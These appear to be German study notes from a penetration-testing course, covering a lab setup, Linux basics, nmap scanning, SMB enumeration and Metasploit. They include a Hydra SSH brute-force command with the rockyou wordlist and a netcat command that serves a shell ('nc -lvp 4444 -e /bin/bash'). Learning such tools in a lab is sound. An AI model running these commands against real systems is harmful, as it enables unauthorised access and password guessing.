Skip to main content

Heise Hacking Kurs

Testumgebung:
Windows-Rechner:
IP-Adresse: 10.1.1.129
MAC-Adresse: BA-F0-EC-81-03-92
Kali-Linux:
IP-Adresse: 10.1.1.128
MAC-Adresse: FE-3A-E0-10-0E-35

Serverschutz Bausteine von BSI

Schichtenmodel TCP/IP

image.png

Infos

Generell

127.0.0.1 = localhost : Jedes Paket geht wieder zurück auf den sendenden Rechner

Wireshark 

ARP = Address Resolution Protocol dient dazu MAC adressen auszulesen 


Befehle: 

Befehl Beispiel
sipcalc sipcalc 192.168.178.0/24 Stellt die Subnetzmaske mit den IP-Adressen dar
ls -la | grep ls -la | grep go Gibt dann nur Inhalte wieder, die go enthalten
find  find . Gibt alles aus
find . | grep find . | grep go Findet alles in Laufwerk und gibt aber nur inhalte mit go zurück 
locate
Suche über die gesamte Festplatte


Berechtigungen

-rw-r--r-- 1 dapelza dapelza 0 31. Jan 10:19 test.txt Berechtigung User Gruppe Größe Datum Dateiname 3 Bits Besitzer 3 Bits Gruppe 3 Bits alle anderen

Bit Berechtigung
r Read
w Write
Execute (Ausführen)
Berechtigung ändern

chmod +x test.txt
Alle dürfen ausführen
chmod -x test.txt
Berechtiung nehmen
chmod u+x test.txt
Nur der User darf die Datei ausführen
chmod g+x test.txt
Gruppe darf ausführen


Phasen des Hacking

image.png

Passives Scannen

hunter.io

Email-Adressen von Unternehmen herausfinden

Burp Suite

Zum Auslesen von Http Code über einen Proxy

DefaultCreds-cheat-sheet

DefaultCreds-cheat-sheet/DefaultCreds-Cheat-Sheet.csv at main · ihebski/DefaultCreds-cheat-sheet · GitHub

Webseiten überprüfen

builtwith.com


Aktives Scannen

Nmap

Parameter Kommentar
nmap -sn 10.1.1.0/24
Pingt einen ip-Bereich und gibt die Teilnehmer wieder.
nmap 10.1.1.136 -v Vorher schon ergebnisse Anzeigen
nmap 10.1.1.136 -oN /pfad/zur/datei speichert die ergebnisse in einer Datei ab
nmap 10.1.1.136 -p40,21 können bestimmte Ports gescannt werden 
nmap 10.1.1.136 -sU Scannta auch udap 
nmap 10.1.1.136 -A Führt scripte aus

Dirbuster

Scannt nach unterverzeichnisen auf einer Domain


Im internet nach Exploits suchen 

Beispiel: exploitdb Wordpress 4.9

searchsploit 

findet schwachstellen in einer Software

smbmap 

findet schwachstellen in der SMB freigabe

smbmap -u '' -H 10.0.2.9

-u '' = User aber nicht angeben. 

Enum4Linux 

findet usernamen

enum4linux 10.1.1.150 -U


Hydra

Brutforce auf ssh oder smb

hydra -l jan -P /usr/share/wordlist/rockyou.txt ssh://10.1.1.12 -t 4


Exploit-Datenbanken

www.exploit-db.com
www.cvedetails.com


Exploits

Metasploit framework

msfconsole

Bevor man mit msf los legt:

Datenbank starten

sudo msfdb init

Postgressql dienst starten

sudo systemctl start postgresql

Metasploit verwenden

Module

search proftp


use exploit/windwos/ftp/proftp_banner

oder

use 4

danach: 

options

set Rhosts

show payloads

show targets

Netcat

Opfer

nc -lvp 4444 - Damit kann man generell auf eine Verbindung lauschen

nc -lvp 4444 -e /bin/bash - Würde bei Verbindung eine Shell starten

Angreifer

nc 10.1.1.138 4444 - Stellt eine Verbindung zum lauschenden Opfer auf dem Port 4444 her


Pentest MOnkey reverse shell